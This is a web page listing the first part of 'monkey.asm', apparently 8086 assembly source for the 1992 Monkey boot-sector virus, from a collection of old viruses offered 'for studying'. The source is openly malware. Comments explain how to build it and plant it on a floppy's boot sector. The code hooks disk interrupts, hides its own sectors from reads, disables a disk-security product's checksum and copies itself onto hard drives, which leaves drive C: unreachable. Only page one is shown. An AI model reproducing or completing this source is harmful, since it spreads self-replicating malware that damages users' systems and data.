📄 monkey.asm

📁 More than 800 virus code (old school) just for fun and studying prehistoric viruses. WARNING: use
💻 ASM
📖 第 1 页 / 共 2 页
字号:
12 下一页
       page    70,80       Name    Monkey;*******************************************************;;      Monkey written at the city of champions;       - Edmonton - by UACVRS - Jan 1992.;;     Monkey is a full stealth MBR/Boot self-replicating program with;     no payload but it does not save the HD's partition;     table in place. When the "infected" computer is booted;     from a floppy, c: drive will no longer be accessible.;;     To compile: masm monkey     (we used MASM 5.0);                 link monkey;                 exe2bin monkey.exe monkey.co;     Use NU, or debug to copy monkey.co to the boot;        sector of a floppy. The diskette will not boot;        but will install itself on the hard drive.;;     Bug: It will trash any floppies higher than;          1.44meg, not deliberately.;;*******************************************************Code   Segment       Assume  CS:Code,DS:CODE,ES:CODE       ORG     00HMAIN:       JMP     INITIAL; space above 1fh is for floppy format data       ORG     1FHINT_13     EQU     THIS BYTE          PUSH    DS          PUSH    SI          PUSH    DI          PUSH    AX          PUSH    CX          PUSH    DX          CALL    SET_HEAD          CMP     AH,02H          JNZ     END_ACTION          PUSH    DX          SUB     AX,AX          INT     1AHTIME      EQU $ + 2          CMP     DL,40H          POP     DX          JNB     END_ACTION          CALL HANDLE_DISKEND_ACTION:          POP   DX          POP   CX          POP   AX          POP   DI          PUSH  DX          PUSH  CX          PUSH  AX          CMP   CX,03H                 ; YES, IS SECTOR LESS THAN 3?          JNB   EXIT_2                 ; NO, EXIT          CMP   DH,BYTE PTR DS:[SI]    ; Right head?          JNZ   EXIT_2                 ; NO, EXIT          CMP   AH,02H                 ; READ ?          JZ    STEALTH                ; YES, STEALTH          CMP   AH,03H                 ; WRITE ?          JNZ   EXIT_2                 ; NO, EXIT                                       ; YES!          CMP   DL,80H                 ; HARD DRIVE?          JB    EXIT_2                 ; NO, EXIT          SUB   AH,AH            ; else RESET DISK - make HD light blink          JMP   SHORT EXIT_2           ; EXITSTEALTH:          CALL  INT13                  ; READ          JB    EXIT_3                 ; ERROR?          CALL  COMP_SIG               ; MY RELATIVE?          JZ    REDIRECT               ; YES, REDIRECT          CALL  COMP_PA                ; NO, IS IT PA?          JZ    REDIRECT               ; YES, REDIRECTEXIT_0:          CLC                          ; NO, RESET FLAG          JMP   SHORT EXIT_3           ; EXITREDIRECT:          CALL  CHSEC        ; CALC. THE SECTOR TO HIDE & PUT IN CL          MOV   DH,BYTE PTR DS:[SI+1]  ; SET RIGHT HEAD          POP   AX                     ; RESTORE AX          CALL  INT13                  ; RE-READ          CALL  ENCRPT_PBR          POP   CX                     ; RESTORE CX, DX          POP   DX          JMP   SHORT EXIT_4           ; EXITEXIT_2:          CALL  INT13EXIT_3:          POP   DS          POP   DS          POP   DSEXIT_4:          POP   SI          POP   DS          RETF  0002HREAD_SEC_1:          MOV   AX,0201H         ; READINT13 PROC NEAR          PUSHF          CALL  DWORD PTR CS:INT13_ADDR     ;***********          RETINT13 ENDPHOOK_ENTRY   EQU  THIS BYTEHOOK:          INT   12H          MOV   SI,004CH          PUSH  SI          CMP   BYTE PTR CS:HOME_SEC,02H       ; I am in sector 2?          JZ    SETUP_SPECIALSETUP_NORMAL:          CALL  SHIFT_NORMAL          MOV   DI,OFFSET INT13_ADDR          MOV   CX,0002H          CLD          REPZ  MOVSW          JMP   SHORT STORE_SEGMENTSETUP_SPECIAL:          CALL  SHIFT_SPECIALSTORE_SEGMENT:          POP   SI          MOV   WORD PTR DS:[SI],OFFSET INT_13  ; STORE MY ENTRY POINT          MOV   DS:[SI+2],AX            ; STORE MY SEGMENTPATCH_OVER:          PUSH  CS          POP   DS          CALL  PATCH           ; PATCH OVER          PUSH  ES              ; PUSH SEGMENT          MOV   AX,OFFSET JMP_ADDR          PUSH  AX              ; PUSH ADDRESS          STI          RETF                 ; FAR JMP    JMP_ADDR   EQU THIS BYTEBOOT:          MOV   ES,CX          MOV   BX,SP            ; TO 0000:7C00          PUSH  CX              ; SAVE JMP SEGMENT          PUSH  BX          MOV   DX,0080H         ; HANDLE C:          CALL  SET_HEAD          CALL  HANDLE_DISKBOOT_SEC  EQU $ + 1          MOV   CL,05H           ; FROM SECTOR 3   ????BOOT_DISK  EQU $ + 1          MOV   DX,0100H         ; C:, HEAD 0      ????          CALL  READ_SEC_1      ; INT 13          CALL  ENCRPT_PBR          RETFHANDLE_DISK PROC NEAR          ; *** READ SECTOR 1 ***          SUB   CX,CX          INC   CX          PUSH  CX          MOV   DH,[SI]          ; HEAD          CALL  READ_SEC_1      ; INT 13          JB    END_HANDLE_DISK          ; ERROR -> END          ; *** COMPARE ***          CALL  COMP_SIG          JZ    E_2                      ; SAME -> UPDATE MYSELF          ; *** PA?  ***          CALL  COMP_PA                  ; Is it Pagett's disksec?          JNZ   UPDATE_DISK              ; NO          ; *** OK?  ***          INC   CX          CMP   WORD PTR ES:[BX+1FAH],00H ; when this byte in disksec is set                                          ; to 0 means disksec would not do                                          ; checksum of partitions - Pagett                                          ; sucks          JZ    E_2                       ; SAME -> UPDATE MYSELF          MOV   WORD PTR ES:[BX+1FAH],00H ; set this to zero          MOV   CL,1H                     ; write the change back to sector 1          CALL  WRITE_SEC_1               ;          JB    END_HANDLE_DISK          ; *** YES! READ SECTOR 2  ***          INC   CX              ; yes,Pagette 's disksecure is on sector 1          MOV   DH,[SI+2]       ; My relative is on sector 2 - read sector 2          CALL  READ_SEC_1      ; INT 13          JB    END_HANDLE_DISK ; ERROR -> END          POP   AX          PUSH  CXUPDATE_DISK:          CALL  CHSEC        ; CALC. THE SECTOR TO HIDE & PUT IN CL          CALL  ENCRPT_PBR          INC   SI          CALL  WRITE_SEC_1          DEC   SI          JB    END_HANDLE_DISK          CALL  ENCRPT_PBR          PUSH  CX          CALL  PATCH          POP   CX          PUSH  DX          CMP   DL,80H          JNB   E_1          XOR   DL,DLE_1:          MOV   WORD PTR ES:[BX+BOOT_DISK],DX          POP   DX          MOV   BYTE PTR ES:[BX+BOOT_SEC],CL          POP   CX          PUSH  CX          MOV   BYTE PTR ES:[BX+OFFSET HOME_SEC],CL          MOV   WORD PTR ES:[BX+OFFSET BOOT_SIG],0AA55HE_2:          CALL  WRITE_SEC_1END_HANDLE_DISK:          POP   AX          RETHANDLE_DISK ENDPWRITE_SEC_1 PROC NEAR          MOV  DH,[SI]WRITE_SEC_2:          MOV  AX,0301H          CALL INT13          RETWRITE_SEC_1 ENDPCOMP_SIG PROC NEAR   CMP     ES:[BX+OFFSET PROG_SIG],9219H   RETCOMP_SIG   ENDPCOMP_PA PROC NEAR   CMP   WORD PTR ES:[BX+119H],6150H   ; PA?   RETCOMP_PA    ENDPHOME_SEC    DB     01HFLOPPY_HEAD DB     00H,01H,01HHARD_HEAD   DB     00H,00H,00H                  ;  360 720 1.2 1.44FLOP_SECT_TABLE   DB  02H,05H,09H,0BHSAVE_SECT_TABLE   DB  03H,05H,0EH,0EHCHSEC PROC NEAR   PUSH    DI   PUSH    SI   MOV     AL,ES:[BX+14H]   MOV     CX,0004HCHSEC_1:   MOV     SI,CX   DEC     SI   CMP     FLOP_SECT_TABLE[SI],AL   JZ      CHSEC_END_1   LOOP    CHSEC_1   MOV     CL,03H   JMP     SHORT CHSEC_END_2CHSEC_END_1:   MOV     CL,SAVE_SECT_TABLE[SI]CHSEC_END_2:   POP     SI   POP     DI   RETCHSEC      ENDPSHIFT_NORMAL PROC NEAR ; FIND THE SEGMENT TO HIDE    DEC    AX    MOV    DS:[413H],AXSHIFT_SPECIAL:    MOV    CL,06H    SHL    AX,CL    ADD    AL,20H    MOV    ES,AX    RETSHIFT_NORMAL     ENDPPATCH PROC NEAR         ; PATCH ON BOOT SECTOR STARTING AT BYTE int_13    PUSH  SI    MOV   DI,BX    MOV   SI,OFFSET INT_13    ADD   DI,SI;   CLD    MOV   CX,OFFSET PROG_END - OFFSET INT_13    REPZ  MOVSBPATCH_JMP:    MOV   DI,BX    SUB   SI,SI    MOV   CL,3H    REPZ  MOVSB
12 下一页
⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -